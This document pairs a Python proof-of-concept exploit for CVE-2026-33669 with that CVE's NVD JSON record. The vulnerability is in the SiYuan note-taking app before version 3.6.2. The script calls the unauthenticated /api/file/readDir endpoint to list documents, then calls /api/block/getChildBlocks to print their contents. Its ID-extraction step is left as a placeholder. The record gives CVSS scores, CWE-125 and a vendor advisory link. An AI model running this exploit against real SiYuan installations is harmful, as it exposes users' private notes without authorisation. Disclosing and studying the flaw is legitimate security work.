CVE-2026-33669

import requests import json target_url = "http://localhost:6806" # Step 1: Retrieve document IDs via /api/file/readDir # This endpoint is vulnerable and does not require authentication read_dir_api = f"{target_url}/api/file/readDir" payload = {"path": "/"} headers = {"Content-Type": "application/json"} try: print("[+] Attempting to retrieve document IDs...") response = requests.post(read_dir_api, json=payload, headers=headers) if response.status_code == 200: data = response.json() print("[+] Successfully retrieved directory structure:") print(json.dumps(data, indent=2)) # Check if we have data to proceed to step 2 # Note: Actual ID extraction logic depends on the specific JSON structure returned by SiYuan if 'data' in data: # Assuming IDs are present in the response, we simulate the extraction # For demonstration, we assume we found a block ID '202303...' # In a real scenario, parse the 'data' field recursively to find all IDs. document_ids = ["placeholder_id"] if document_ids: # Step 2: Retrieve content via /api/block/getChildBlocks get_block_api = f"{target_url}/api/block/getChildBlocks" for doc_id in document_ids: print(f"[+] Fetching content for ID: {doc_id}") block_payload = {"id": doc_id} block_resp = requests.post(get_block_api, json=block_payload, headers=headers) if block_resp.status_code == 200: print("[+] Content retrieved successfully:") print(block_resp.text) else: print(f"[-] Failed to retrieve content for ID: {doc_id}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-33669", "sourceIdentifier": "[email protected]", "published": "2026-03-26T22:16:29.887", "lastModified": "2026-03-30T17:03:33.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is a personal knowledge management system. Prior to version 3.6.2, document IDs were retrieved via the /api/file/readDir interface, and then the /api/block/getChildBlocks interface was used to view the content of all documents. Version 3.6.2 patches the issue."}, {"lang": "es", "value": "SiYuan es un sistema de gestión de conocimiento personal. Antes de la versión 3.6.2, los ID de los documentos se recuperaban a través de la interfaz /API/file/readDir, y luego se utilizaba la interfaz /API/block/getChildBlocks para ver el contenido de todos los documentos. La versión 3.6.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.2", "matchCriteriaId": "27CB71A7-7208-417A-AE6D-266D57F683E9"}]}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-34xj-66v3-6j83", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}